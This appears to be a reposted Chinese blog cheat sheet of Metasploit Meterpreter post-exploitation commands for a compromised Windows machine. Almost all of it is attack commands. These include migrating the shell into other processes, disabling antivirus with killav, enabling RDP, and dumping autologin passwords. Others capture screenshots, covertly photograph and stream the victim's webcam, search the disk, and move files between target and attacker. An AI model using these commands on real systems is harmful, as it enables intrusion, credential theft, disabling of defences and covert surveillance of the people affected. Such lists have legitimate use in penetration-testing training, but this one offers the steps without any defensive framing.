滲透之——Metasploit-Meterpreter Shell資訊收集相關的命令
轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/85944005
PS:以下所有的命令都是在Metasploit-Meterpreter Shell下執行的。
一、程序遷移
1、獲取目標機正在執行的程序
ps
2.檢視Meterpreter Shell的程序號
getpid
3.將Meterpreter Shell程序繫結到其他程序中
migrate 要繫結到的程序id號
4.系統自動尋找合適的程序遷移
run post/windows/manage/migrate
二、系統命令
1.檢視目標機的系統資訊
sysinfo
2.檢視目標機是否執行在虛擬機器上
run post/windows/gather/checkvm
3.檢視目標機最近的執行時間
idletime
4.檢視目標機完整的網路設定
route
5.將當前會話放到後臺
background
6.檢視目標機器上已經滲透成功的使用者名稱
getuid
7.關閉目標機防毒軟體
run post/windows/manage/killav
8.啟動目標機的遠端桌面協議
run post/windows/manage/enable_rdp
9.檢視目標機的本地子網情況
run post/windows/manage/autoroute
10.列舉當前有多少使用者登入了目標機
run post/windows/gather/enum_logged_on_users
11.列舉安裝在目標機上的應用程式
run post/windows/gather/enum_applications
12.抓取目標機自動登入的使用者名稱和密碼
run post/windows/gather/credentials/windows)autologin
13.抓取目標機螢幕截圖
load espia
screengrab
或者
screenshot
14.檢視目標機有沒有攝像頭
webcam_list
15.開啟目標機攝像頭拍照
webcam_snap
此命令會將目標機攝像頭拍照的圖片,以圖片的形式儲存在攻擊機的/root目錄下
16.開啟攝像頭直播模式
webcam_stream
此命令會將目標機攝像頭錄製的視訊,以html檔案的形式儲存在攻擊機的/root目錄下
17.進行目標機shell
shell
18.停止Meterpreter會話或者停止Shell會話返回Meterpreter
exit
三、檔案系統命令
1.檢視當前處於目標機的哪個目錄
pwd或getwd
2.檢視當前處於本地的哪個目錄
getlwd
3.列舉目標機當前目錄中的所有檔案
ls
4.切換目標機目錄
cd
5.搜尋C盤所有以.txt為副檔名的檔案
search -f *.txt -d c:\
其中,-f引數用於執行搜尋檔案模式,-d引數用於指定在哪個目錄下進行搜尋
6.下載目標機C盤的test.txt檔案到攻擊機/root下
download c:\test.txt /root
7.上傳攻擊機root目錄下的test.txt檔案到目標機C盤下
upload /root/test.txt c:\